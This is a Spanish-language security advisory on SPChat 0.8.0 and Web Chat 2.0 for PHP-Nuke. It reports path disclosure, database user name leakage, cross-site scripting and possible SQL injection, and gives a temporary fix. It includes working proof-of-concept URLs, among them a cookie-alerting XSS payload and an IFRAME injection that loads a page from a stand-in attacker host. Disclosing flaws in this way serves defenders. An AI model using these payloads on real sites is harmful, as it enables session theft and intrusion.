Multiples vulnerabilidades en SPChat 2.0 para PHP-Nuke & SPChat 0.8.0

Systems Affected: Web Chat 2.0 for PHP-Nuke & SPChat 0.8.0
Vendor URL: http://www.saarport.net
Vuln Type: XSS (Cross Site Scripting), Path Disclosure, revealed of DBUser Name, possible injection SQL
Status: Vendor contacted, In a moment estara available the patched version. (http://www.saarport.net/modules.php?name=Forums&file=viewtopic&p=1029)
Author: XyborG (http://www.rzw.com.ar)

Intro:

SFChat & WebChat son unos muy buenos sistemas de Chat online, pero tienen sus fallas :)

Nota: El nombre del modulo WebChat, yo he usado ese nombre para los ejemplos.

Solucion:

El creador ha sido contactado, y el nuevo parche estara disponible muy pronto, pero como solucion temporaria, les recomiendo quitar dicho modulo o cambiar su nombre, de forma tal que nadie tenga acceso a sus archivos, NO basta con desactivar el modulo desde el panel de administracion del PHP-Nuke.

Exploit:

Web Chat 2.0 for PHP-Nuke:

Path Disclosure (see the source code):

http://www.victim.com/modules/WebChat/out.php

—– Source Code —–

?br />
?b>Warning?/b>: Access denied for user: ‘victim@localhost’ (Using password: YES) in ?b>/home/virtual/site3/fst/var/www/html/modules/WebChat/inc/mysql.lib.php on line ?b>33?/b>?br />
?/TD>?/TR>?/TABLE>?B>Database error:?/B> Link_ID == false, connect failed

?B>MySQL error?/B>: 0 ()?BR>
Session halted.

—– Source Code —–

(Nota: Reemplace ‘?’ por ‘<')

Path Disclosure:

http://www.victim.com/modules.php?op=modload&name=WebChat&file=index&roomid=Non_Numeric

Path Disclorure & revealed of DBUser Name & XSS, SQL Injection?:

http://www.victim.com/modules/WebChat/in.php

http://www.victim.com/modules/WebChat/quit.php

http://www.victim.com/modules/WebChat/users.php

http://www.victim.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username=[Any_Word_or_your_code]

http://www.victim.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username=”>alert(document.cookie);

SPChat Ver. 0.8.0:

Cross Site Scripting:
http://www.victim.com/modules.php?op=modload&name=SPChat&file=index&statussess=?IFRAME%20src=”http://www.attacker.com.ar/attack.htm”%20marginWidth=0%20marginHeight=0%20frameBorder=0%20width=500%20scrolling=yes%20height=500>?/IFRAME>

—– Source Code For attack.htm for eg. —–
?script>
alert(document.cookie);
?/script>
—– Source Code For attack.htm —–

(Nota: Reemplace ‘?’ por ‘<')

Descubierto por XyborG

Rynho Zeros Web

Multiples vulnerabilidades en SPChat 2.0 para PHP-Nuke & SPChat 0.8.0

Otros articulos que te pueden interesar